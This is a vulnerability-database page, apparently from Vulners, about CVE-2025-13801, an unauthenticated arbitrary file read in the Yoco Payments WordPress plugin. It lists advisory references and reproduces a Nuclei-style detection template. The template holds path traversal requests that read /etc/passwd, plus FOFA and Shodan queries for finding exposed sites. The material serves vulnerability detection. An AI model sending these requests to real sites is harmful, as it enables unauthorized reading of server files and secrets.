| Reporter | Title | Published | Views | Family All 11 |
|---|---|---|---|---|
| CVE-2025-13801 | 7 Jan 202611:15 | – | circl | |
| WordPress plugin Yoco Payments 路径遍历漏洞 | 7 Jan 202600:00 | – | cnnvd | |
| CVE-2025-13801 | 7 Jan 202609:21 | – | cve | |
| CVE-2025-13801 Yoco Payments <= 3.9.0 - Unauthenticated Arbitrary File Read | 7 Jan 202609:21 | – | cvelist | |
| EUVD-2026-1310 | 7 Jan 202609:21 | – | euvd | |
| CVE-2025-13801 | 7 Jan 202612:16 | – | nvd | |
| WordPress Yoco Payments plugin <= 3.8.8 - Unauthenticated Arbitrary File Read vulnerability | 7 Jan 202606:21 | – | patchstack | |
| PT-2026-1606 | 7 Jan 202600:00 | – | ptsecurity | |
| CVE-2025-13801 | 9 Jan 202608:46 | – | redhatcve | |
| CVE-2025-13801 Yoco Payments <= 3.9.0 - Unauthenticated Arbitrary File Read | 7 Jan 202609:21 | – | vulnrichment |
id: CVE-2025-13801
info:
name: Yoco Payments <= 3.8.8 - Path Traversal
author: 0x_Akoko
severity: high
description: |
Yoco Payments WordPress plugin <= 3.8.8 contains a path traversal caused by improper validation of the file parameter, letting unauthenticated attackers read arbitrary files on the server.
impact: |
Unauthenticated attackers can read sensitive files on the server, potentially exposing confidential information.
remediation: |
Update to the latest version beyond 3.8.8.
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cwe-id: CWE-22
metadata:
verified: true
max-request: 2
fofa-query: body="yoco-payment-gateway"
shodan-query: http.html:"yoco-payment-gateway"
tags: wordpress,wp-plugin,yoco,lfi,path-traversal,unauth
flow: http(1) && http(2)
http:
- raw:
- |
GET /wp-content/plugins/yoco-payment-gateway/readme.txt HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- status_code == 200
- contains_all(body, "=== Yoco Payments ===", "Stable tag:")
- compare_versions(plugin_version, '<= 3.8.8')
condition: and
internal: true
extractors:
- type: regex
name: plugin_version
part: body
group: 1
regex:
- '(?m)Stable tag:\s*([0-9.]+)'
internal: true
- raw:
- |
GET /wp-json/yoco/logs?file=../../plugins/yoco-payment-gateway/../../../../../../etc/passwd HTTP/1.1
Host: {{Hostname}}
- |
GET /?rest_route=/yoco/logs&file=../../plugins/yoco-payment-gateway/../../../../../../etc/passwd HTTP/1.1
Host: {{Hostname}}
stop-at-first-match: true
matchers:
- type: dsl
dsl:
- status_code == 200
- regex('root:[x*]?:0:0:', body)
condition: and
# digest: 4a0a00473045022005c44ce1a56374026c3bbf615772e5ffb6e12021931bcc171a313875793b1302022100ebd22bb6d1d0bd71e58a53fa8d85892ad61b70453c737a85e66b6f7da1122019:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation